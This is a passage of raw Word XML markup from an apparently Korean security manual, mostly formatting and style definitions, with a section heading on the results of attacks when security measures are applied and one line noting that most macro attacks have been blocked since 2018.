            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t xml:space="preserve">2018이후로는 거의 모든 매크로 공격이 막혀있다. </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="424" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:ind w:leftChars="0"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="266" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="646" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="266" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:widowControl/>
        <w:wordWrap/>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="10686" w:type="dxa"/>
        <w:tblBorders>
          <w:top w:val="none"/>
          <w:left w:val="none"/>
          <w:bottom w:val="none"/>
          <w:right w:val="none"/>
          <w:insideH w:val="none"/>
          <w:insideV w:val="none"/>
        </w:tblBorders>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="10686"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="80" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac" w:hint="eastAsia"/>
                <w:noProof/>
                <w:sz w:val="38"/>
                <w:szCs w:val="38"/>
              </w:rPr>
              <mc:AlternateContent>
                <mc:Choice Requires="wps">
                  <w:drawing>
                    <wp:anchor distT="0" distB="0" distL="114300" distR="114300" behindDoc="1" locked="0" layoutInCell="1" simplePos="0" relativeHeight="251679744" allowOverlap="1" hidden="0">
                      <wp:simplePos x="0" y="0"/>
                      <wp:positionH relativeFrom="margin">
                        <wp:posOffset>-59055</wp:posOffset>
                      </wp:positionH>
                      <wp:positionV relativeFrom="margin">
                        <wp:posOffset>-8467725</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="6772275" cy="6991350"/>
                      <wp:effectExtent l="0" t="0" r="0" b="0"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1047" name="shape1047" hidden="0"/>
                      <wp:cNvGraphicFramePr/>
                      <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                        <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                          <wps:wsp>
                            <wps:cNvSpPr>
                              <a:spLocks/>
                            </wps:cNvSpPr>
                            <wps:spPr>
                              <a:xfrm>
                                <a:off x="0" y="0"/>
                                <a:ext cx="6772275" cy="6991350"/>
                              </a:xfrm>
                              <a:prstGeom prst="rect">
                                <a:avLst/>
                              </a:prstGeom>
                              <a:solidFill>
                                <a:schemeClr val="lt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47" style="position:absolute;margin-left:-4.65pt;margin-top:-666.75pt;width:533.25pt;height:550.5pt;mso-position-horizontal-relative:margin;mso-position-vertical-relative:margin;v-text-anchor:middle;mso-wrap-style:square;z-index:-251679744" o:allowincell="t" filled="t" fillcolor="#ffffff" stroked="f">
                      <v:fill opacity="27525f"/>
                      <v:stroke joinstyle="round"/>
                    </v:rect>
                  </w:pict>
                </mc:Fallback>
              </mc:AlternateContent>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="873" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:bottom w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:eastAsia="ko-KR"/>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
                <w:rtl w:val="off"/>
              </w:rPr>
              <w:t>4</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">. </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t xml:space="preserve">보안대책 적용시 공격결과 </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="DX국민시대" w:eastAsia="DX국민시대" w:hAnsi="DX국민시대" w:hint="eastAsia"/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>최종 매뉴얼에 포함)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="424" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="thinThickThinSmallGap" w:sz="24" w:space="0" w:color="204E5F"/>
              <w:bottom w:val="nil"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="424" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:ind w:leftChars="0" w:left="360"/>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="424" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="424" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:trHeight w:val="425" w:hRule="atLeast"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="10686" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="nil"/>
              <w:right w:val="nil"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="lt2"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
              <w:rPr>
                <w:rFonts w:ascii="D2Coding" w:eastAsia="D2Coding" w:hAnsi="D2Coding"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="나눔스퀘어_ac" w:eastAsia="나눔스퀘어_ac" w:hAnsi="나눔스퀘어_ac"/>
          <w:sz w:val="38"/>
          <w:szCs w:val="38"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="72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나눔스퀘어_ac">
    <w:panose1 w:val="020B0600FFFFFFFFFFFF"/>
    <w:family w:val="modern"/>
    <w:charset w:val="81"/>
    <w:notTrueType w:val="false"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000203" w:usb1="29D72C10" w:usb2="00000010" w:usb3="00000000" w:csb0="00280005" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DX인생극장B">
    <w:family w:val="roman"/>
    <w:altName w:val="바탕"/>
    <w:charset w:val="81"/>
    <w:notTrueType w:val="false"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800002A7" w:usb1="29D7FCFB" w:usb2="00000010" w:usb3="00000000" w:csb0="0028000D" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="DX국민시대">
    <w:panose1 w:val="02020600FFFFFFFFFFFF"/>
    <w:family w:val="roman"/>
    <w:charset w:val="81"/>
    <w:notTrueType w:val="false"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800002A7" w:usb1="29D7FCFB" w:usb2="00000010" w:usb3="00000000" w:csb0="0028000D" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="D2Coding">
    <w:panose1 w:val="020B0609020101020101"/>
    <w:family w:val="modern"/>
    <w:charset w:val="81"/>
    <w:notTrueType w:val="false"/>
    <w:sig w:usb0="800002EF" w:usb1="79D7FDFB" w:usb2="00000034" w:usb3="00000001" w:csb0="00080001" w:csb1="00000001"/>
  </w:font>
  <w:font w:name="&quot;Open Sans&quot;">
    <w:charset w:val="00"/>
    <w:notTrueType w:val="fals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displayBackgroundShape/>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style w:type="paragraph" w:default="1" w:styleId="Normal">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:widowControl w:val="off"/>
      <w:wordWrap w:val="off"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:default="1" w:styleId="DefaultParagraphFont">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="TableNormal">
    <w:name w:val="Normal Table"/>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rmal">
    <w:name w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:autoSpaceDE w:val="off"/>
      <w:autoSpaceDN w:val="off"/>
      <w:widowControl w:val="off"/>
      <w:wordWrap w:val="off"/>
    </w:pPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableNormal">
    <w:name w:val="Normal Table"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:tblPr>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>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aultParagraphFont">
    <w:name w:val="Default Paragraph Font"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="numbering" w:styleId="NoList">
    <w:name w:val="No List"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:semiHidden/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char0">
    <w:name w:val="바닥글 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Normal"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="Normal"/>
    <w:unhideWhenUsed/>
    <w:pPr>
      <w:snapToGrid w:val="0"/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4513"/>
        <w:tab w:val="right" w:pos="9026"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Char">
    <w:name w:val="머리글 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Normal"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:ind w:leftChars="400" w:left="8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jpeg" /><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg" /><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg" /><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg" /><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg" /><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image6.jpeg" /><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image7.jpeg" /><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image8.jpeg" /><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image9.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styles" Target="styles.xml" /><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/settings" Target="settings.xml" /><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/fontTable" Target="fontTable.xml" /><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/webSettings" Target="webSettings.xml" /><Relationship Id="rId16"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1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-12-20T13:20:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-12-30T08:23:03Z</dcterms:modified>
  <cp:version>0900.0001.01</cp:version>
</cp:coreProperties>
</file>